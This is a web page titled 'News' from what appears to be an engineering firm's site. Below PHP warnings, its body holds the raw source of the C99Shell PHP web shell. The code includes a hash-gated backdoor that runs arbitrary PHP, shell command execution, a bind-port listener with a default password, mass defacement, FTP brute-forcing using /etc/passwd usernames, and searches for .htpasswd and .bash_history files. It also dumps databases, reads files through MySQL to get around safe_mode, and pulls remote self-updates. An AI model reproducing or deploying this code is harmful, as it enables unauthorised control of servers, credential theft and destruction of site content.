News


Warning: Pager::getPagerData(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /home/picoengi/public_html/engineering/news_en.php on line 162

Strict Standards: Non-static method Pager::getPagerData() should not be called statically in /home/picoengi/public_html/engineering/news_en.php on line 162

  tiitle

array("ext1","ext2","ext3",...), // "{action2}"=>array("ext1","ext2","ext3",...), // ... // ) $ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar") ); $hexdump_lines = 8; // lines in hex preview file $hexdump_rows = 24; // 16, 24 or 32 bytes in one line $nixpwdperpage = 9999; // Get first N lines from /etc/passwd $bindport_pass = "c99"; // default password for binding $bindport_port = "11457"; // default port for binding /* Command-aliases system */ $aliases = array(); $aliases[] = array("-----------------------------------------------------------", "ls -la"); /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); /* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); /* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name "config*""); /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name "config*""); /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); /* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); /* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); /* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); /* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); /* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); /* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" $sess_cookie = "c99shvars"; // cookie-variable name if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} $sess_file = $tmpdir."c99shvars_".$sid.".tmp"; $usefsbuff = true; //Buffer-function $copy_unset = false; //Delete copied files from buffer after pasting //Quick launch $quicklaunch = array(); $quicklaunch[] = array("",$surl); $quicklaunch[] = array("","#" onclick="history.back(1)"); $quicklaunch[] = array("","#" onclick="history.go(1)"); $quicklaunch[] = array("",$surl."act=ls&d=%upd"); $quicklaunch[] = array("",""); $quicklaunch[] = array("",$surl."act=search&d=%d"); $quicklaunch[] = array("",$surl."act=fsbuff&d=%d"); $quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d"); $quicklaunch[] = array("Bind",$surl."act=bind&d=%d"); $quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d"); $quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d"); $quicklaunch[] = array("LSA",$surl."act=lsa&d=%d"); $quicklaunch[] = array("SQL",$surl."act=sql&d=%d"); $quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d"); $quicklaunch[] = array("PHP-info",$surl."act=phpinfo" target="blank="_target"); $quicklaunch[] = array("Self remove",$surl."act=selfremove"); $quicklaunch[] = array("Logout","#" onclick="if (confirm('Are you sure?')) window.close()"); //Hignlight-code colors $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; @$f = $_GET[f]; //END CONFIGURATION // / Next code not for editing / //Starting calls if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(true); @set_magic_quotes_runtime(0); @set_time_limit(0); if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} if(!ini_get("register_globals")) {import_request_variables("GPC");} $starttime = getmicrotime(); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$el) { if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } else {$el = stripslashes($el);} } } strips($GLOBALS); } $tmp = array(); foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\*",".*",preg_quote($v));} $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} elseif(empty($md5_pass)) {$md5_pass = md5($pass);} if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) { header("WWW-Authenticate: Basic realm="c99shell""); header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} exit; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF']; $lastdir = realpath("."); chdir($curdir); if (($selfwrite) or ($updatenow)) { if ($selfwrite == "1") {$selfwrite = "c99shell.php";} c99sh_getupdate(); $data = file_get_contents($c99sh_updatefurl); $fp = fopen($data,"w"); fwrite($fp,$data); fclose($fp); exit; } if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_method; global $sess_cookie; global $sess_file; global $sess_data; $sess_data = $data; $data = serialize($data); if ($sess_method == "file") { $fp = fopen($sess_file,"w"); fwrite($fp,$data); fclose($fp); } else {setcookie($sess_cookie,$data);} } } if (!function_exists("str2mini")) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0, $len)."...".substr($content, -$len); } else {return $content;} } } if (!function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d,$t) { $d = str_replace("\","/",$d); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $h = opendir($d); while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} if (!$ret) {return $ret;} } } return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d,$t) { $d = str_replace("\","/",$d); $t = str_replace("\","/",$t); if (!is_dir($t)) {mkdir($t);} if (is_dir($d)) { if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} return fs_copy_dir($d,$t); } elseif (is_file($d)) { return copy($d,$t); } else {return false;} } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d,$t) { error_reporting(9999); $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} if (!$ret) {return $ret;} } } return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d,$t) { $d = str_replace("\","/",$d); $t = str_replace("\","/",$t); if (is_dir($d)) { if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} return fs_move_dir($d,$t); } elseif (is_file($d)) {return rename($d,$t);} else {return false;} } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o."/"); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\","/",$o); if (is_dir($o)) { if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return false;} } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { return system($cmd); } } if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner['read'] = ($mode & 00400) ? "r" : "-"; $owner['write'] = ($mode & 00200) ? "w" : "-"; $owner['execute'] = ($mode & 00100) ? "x" : "-"; $group['read'] = ($mode & 00040) ? "r" : "-"; $group['write'] = ($mode & 00020) ? "w" : "-"; $group['execute'] = ($mode & 00010) ? "x" : "-"; $world['read'] = ($mode & 00004) ? "r" : "-"; $world['write'] = ($mode & 00002) ? "w" : "-"; $world['execute'] = ($mode & 00001) ? "x" : "-"; if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";} if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";} if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} return $type.$owner['read'].$owner['write'].$owner['execute']. $group['read'].$group['write'].$group['execute']. $world['read'].$world['write'].$world['execute']; } } if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} if (!function_exists("c99sh_getupdate")) { function c99sh_getupdate() { global $updatenow; $data = @file_get_contents($c99sh_updatefurl); if (!$data) {echo "Can't fetch update-information!";} else { $data = unserialize(base64_decode($data)); if (!is_array($data)) {echo "Corrupted update-information!";} else { if ($shver < $data[cur]) {$updatenow = true;} } } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); if (!is_resource($sock)) {echo("Error: $sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = true;} if (empty($add_drop)) {$add_drop = true;} if (empty($file)) { global $win; if ($win) {$file = "C:\tmp\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = true;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } global $SERVER_ADDR; global $SERVER_NAME; $out = "# Dumped by C99Shell.SQL v. ".$shver." # Home page: http://ccteam.ru # # Host settings: # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." # Date: ".date("d.m.Y H:i:s")." # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db "".$db."" #--------------------------------------------------------- "; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;n";} // recieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret[err][] = mysql_error();} else { $row = mysql_fetch_row($res); $out .= $row[1].";nn"; // recieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------nn"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret[err][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $ret; } } if (!function_exists("c99fsearch")) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $a; if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $handle = opendir($d); while ($f = readdir($handle)) { $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); if($f != "." && $f != "..") { if (is_dir($d.$f)) { if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} c99fsearch($d.$f); } else { if ($true) { if (!empty($a[text])) { $r = @file_get_contents($d.$f); if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} if ($a[text_regexp]) {$true = ereg($a[text],$r);} else {$true = strinstr($a[text],$r);} if ($a[text_not]) { if ($true) {$true = false;} else {$true = true;} } if ($true) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($handle); } } //Sending headers header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); global $SERVER_SOFTWARE; if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} else {$win = 0;} if (empty($tmpdir)) { if (!$win) {$tmpdir = "/tmp/";} else {$tmpdir = $_ENV[SystemRoot];} } $tmpdir = str_replace("\","/",$tmpdir); if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") { $openbasedir = true; $hopenbasedir = "".$v.""; } else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} $sort = htmlspecialchars($sort); $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string","#DD0000"); //#DD0000 if ($act != "img") { if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><? echo $HTTP_HOST; ?> - c99shell

!C99Shell v. !

Software:  

uname -a:  

 

Safe-mode: 

Directory: "; foreach($pd as $b) { $t = ""; reset($e); $j = 0; foreach ($e as $r) { $t.= $r."/"; if ($j == $i) {break;} $j++; } echo "".htmlspecialchars($b)."/"; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "".view_perms(fileperms($d.$f)).""; } $free = diskfreespace($d); if (!$free) {$free = 0;} $all = disk_total_space($d); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = round(100/($all/$free),2); echo "
Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
"; if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); echo "".$item[0]."    "; } } $letters = ""; if ($win) { $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); $v = explode("/",$d); $v = $v[0]; foreach ($abc as $letter) { if (is_dir($letter.":/")) { if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";} else {$letters .= "[ ".$letter." ] ";} } } if (!empty($letters)) {echo "
Detected drives: ".$letters;} } ?>



"; if (!$sql_sock) {?>
SQL Manager:
"; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "
Can't connect
"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); if (!$sql_db) {$sqlquicklaunch[] = array("Query","#" onclick="alert('Please, select DB!')");} else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - "".htmlspecialchars($sql_passwd)."")
"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
"; } echo "
i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword 
    HOSTPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { ?>
    Home

    Please, select database
    "; //Start center panel if ($sql_db) { echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    "; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo "
    "; $acts = array("","dump"); if ($sql_act == "query") { echo "
    "; if ($submit) { if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} } if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "



     
    ";} } if (in_array($sql_act,$acts)) { ?>
    Create new table:
     
    SQL-Dump DB:
    "> 
    ";} if ($sql_act == "newtpl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success!
    "; } else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."".
    Reason: ".mysql_error();} } elseif ($sql_act == "dump") { $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "print"; if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} elseif ($dump_out == "download") { @ob_clean(); header("Content-type: c99shell"); header("Content-disposition: attachment; filename="".$f."";"); $set["print"] = 1; $set["nl2br"] = 1; } $set["file"] = $dump_file; $set["add_drop"] = true; $ret = mysql_dump($set); if ($dump_out == "download") {exit;} } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); echo "
    "; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { $tsize += $row["5"]; $trows += $row["5"]; $size = view_size($row["5"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size."      
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     
    "; mysql_free_result($result); } } } else { $acts = array("","newdb","serverstat","servervars","processes","getfile"); if (in_array($sql_act,$acts)) { ?>
    Create new DB:
     
    View File:
     
    "; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success!
    ";} else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."".
    Reason: ".mysql_error();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "
    Server-status variables:

    "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "
    Server variables:

    "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "
    Processes:

    "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; mysql_free_result($result); } elseif (($sql_act == "getfile")) { if (!mysql_create_db("tmp_bd")) {echo mysql_error();} elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} else {mysql_query("LOAD DATA INFILE "".addslashes($sql_getfile)."" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query "".$query."": ".mysql_error();} else { for ($i=0;$i$col_value) {$f .= $col_value;}} if (empty($f)) {echo "File "".$sql_getfile."" does not exists or empty!";} else {echo "File "".$sql_getfile."":
    ".nl2br(htmlspecialchars($f));} } mysql_free_result($result); if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB "tmp_bd"!");} } } } } } echo "
    "; } if ($act == "mkdir") { if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir "".htmlspecialchars($mkdir)."": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir "".htmlspecialchars($mkdir)."": access denied";}} echo "

    "; $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute:
    "; if ($win) {echo "This functions not work in Windows!

    ";} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) { if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} else {$true = true;} } else {$true = true;} if ($true) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "Connected to ".$host." with login "".$login."" and password "".$pass."".
    "; ob_flush(); return true; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { $success++; } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."

    Connects per second: ".round($i/$ftpquick_t,2)."
    "; } } else {echo "

    Read first:

    Users only with shell? 

    ";} } } if ($act == "lsa") { echo "
    Server security information:
    "; echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; echo "Safe-Mode: ".$hsafemode."
    "; echo "Open base dir: ".$hopenbasedir."
    "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} $num = $nixpasswd + $nixpwdperpage; echo "*nix /etc/passwd:
    "; $i = $nixpasswd; while ($i < $num) { $uid = posix_getpwuid($i); if ($uid) {echo join(":",$uid)."
    ";} $i++; } } else {echo "
    Get /etc/passwd
    ";} if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
